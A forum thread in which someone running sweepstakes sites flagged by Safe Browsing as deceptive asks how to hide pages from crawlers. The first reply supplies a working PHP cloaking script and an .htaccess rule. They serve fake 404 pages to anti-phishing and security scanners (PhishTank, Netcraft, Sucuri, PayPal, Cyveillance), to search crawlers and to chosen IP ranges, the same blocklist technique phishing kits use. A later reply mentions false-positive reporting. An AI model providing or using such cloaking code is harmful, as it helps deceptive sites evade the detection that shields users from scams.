Increased security alerts since this past weekend? ("Deceptive site ahead")

ChrisSch · Newbie · Joined Sep 30, 2015 · Messages: 38 · Reaction score: 4
I'm running in the sweepstakes niche. Since this past weekend (around June 26), my sites have been getting blocked for deceptive content (the red warning screen).
It appears to be some update: up until this weekend I had no issues, and now I'm getting flagged left and right, pretty much immediately.

My guess is that I'm caught up in the most recent spam update, even though I don't care about organic search (I use other ways to generate traffic).

Is there a way to hide my pages from bots/crawlers? I have a robots.txt in place, but it doesn't matter, they crawl anyway. How do I hide my folders?

Can anyone drop me a hint?
 
Search for ".htaccess 7G Firewall" and block whatever bots you want (a list is already included; you'll see what to edit). It's also trivial to block them with PHP: include a script in any page you want to protect (or the entire site), something like

PHP:
<?php

// Block by reverse-DNS hostname of the visitor's IP
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_hosts = array("google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit", "msnbot", "netcraft", "paypal", "torservers", "messagelabs", "sucuri.net", "crawler", "baidu", "baidubot", "applebot", "java", "PhantomJS", "metauri.com", "Twitterbot", "above");

foreach ($blocked_hosts as $host) {
    // Case-insensitive substring match against the hostname
    if (stripos($hostname, $host) !== false) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}

// Block by user agent (case-insensitive substring match;
// HTTP_USER_AGENT may be absent, so default to an empty string)
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$uagents = array('Googlebot', 'Baiduspider', 'PhantomJS', 'applebot', 'metauri.com', 'ia_archiver', 'NetcraftSurveyAgent', 'Sogou web spider', 'bingbot', 'Yahoo! Slurp', 'facebookexternalhit', 'msnbot', 'Twitterbot', 'urlresolver', 'Butterfly', 'MJ12bot', 'AhrefsBot', 'Exabot', 'YandexBot', 'TweetedTimes Bot', 'magpie-crawler', 'Mediapartners-Google', 'Spinn3r', 'InAGist', 'Python-urllib', 'NING', 'TencentTraveler', 'Feedfetcher-Google', 'mon.itor.us', 'spbot', 'Feedly', 'bot', 'java', 'curl', 'spider', 'python', 'crawler');

foreach ($uagents as $agent) {
    if (stripos($ua, $agent) !== false) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}

// Block by IP range (regex against REMOTE_ADDR; note the escaped dots)
$blockIP = array('/^46\.116\./', '/^62\.90\./', '/^89\.138\./', '/^82\.166\./', '/^85\.64\./', '/^85\.250\./'); // add your own ranges
foreach ($blockIP as $pattern) {
    if (preg_match($pattern, $_SERVER['REMOTE_ADDR'])) {
        header('HTTP/1.0 404 Not Found');
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}
?>
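For the .htaccess route, here's a minimal sketch of the same idea (the pattern list below is illustrative only; the actual 7G Firewall ships a much longer, maintained ruleset):

```apache
# Deny requests whose User-Agent matches any pattern below ([NC] = case-insensitive).
# The pattern list is an example, not the full 7G ruleset.
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|baiduspider|ahrefsbot|mj12bot|phantomjs|curl|python|spider|crawler) [NC]
    RewriteRule .* - [F,L]
</IfModule>
```

[F] returns 403 Forbidden; if you'd rather serve the stealthier 404 like the PHP version does, mod_rewrite also accepts a status flag, e.g. `RewriteRule .* - [R=404,L]`.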


But if someone reports your site directly to those services, no amount of blocking will help much. Automated scanners also look for specific patterns and strings found in pages like yours, and those will keep messing with your business. And not all bots announce themselves as bots; many use regular user agents that you don't want to block... etc.
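On the robots.txt question: robots.txt is purely advisory. Well-behaved crawlers honor it, but the bots you're worried about ignore it, and since the file is public, listing folders there actually advertises the paths you want hidden. For example (the /promo/ path is just a placeholder):

```
# robots.txt is a request, not access control. Abusive bots ignore it,
# and the file is public, so it reveals the very paths it lists.
User-agent: *
Disallow: /promo/
```

So use it for polite crawlers if you like, but rely on server-side blocking (like the PHP or .htaccess approach) for anything you actually need hidden.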
 
The Google update is not related to your problem in any way; it doesn't affect anything outside the SERPs and rankings.
Make sure your website runs with a valid SSL certificate, and check whether it's been hacked and pages/scripts/files have been added, by reviewing the SERPs (recently indexed pages) and your files.
It could also be a false positive, which you can report here: https://safebrowsing.google.com/safebrowsing/report_error/?hl=en
 